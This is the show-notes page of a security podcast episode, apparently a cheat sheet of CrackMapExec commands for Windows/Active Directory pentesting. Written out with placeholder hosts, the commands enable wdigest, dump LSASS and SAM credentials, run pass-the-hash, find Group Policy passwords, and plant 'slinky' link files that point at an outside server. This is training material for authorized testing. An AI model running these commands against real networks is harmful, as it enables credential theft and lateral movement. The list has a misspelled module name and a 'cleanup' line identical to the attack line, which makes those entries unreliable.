Preview Mode Links will not work in preview mode

7 Minute Security


Mar 3, 2023

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:

 # General enumeration to see if your account works, and where: cme smb x.x.x.x -u username -p pass  # Check if print services are enabled: cme smb x.x.x.x -u username -p pass -M spooler  # Check for the nopac vuln: cme smb x.x.x.x -u username -p pass -M nopac  # Find GP passwords: cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password  # Get list of targets with smb signing: cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt  # Set wdigest flag: cme smb x.x.x.x -u username -p pass -M widgest -o ACTION=enable  # Dump creds/hashes: cme smb x.x.x.x -u username -p pass -M lsassy  # Do pass the hash attacks cme smb x.x.x.x -u username -H HASH  # Dump SAM database: cme smb x.x.x.x -u username -p pass --sam  # Enumerate SMB shares cme smb x.x.x.x -u username -p pass --shares  # Conduct slinky attack:  cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7  # Cleanup from slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7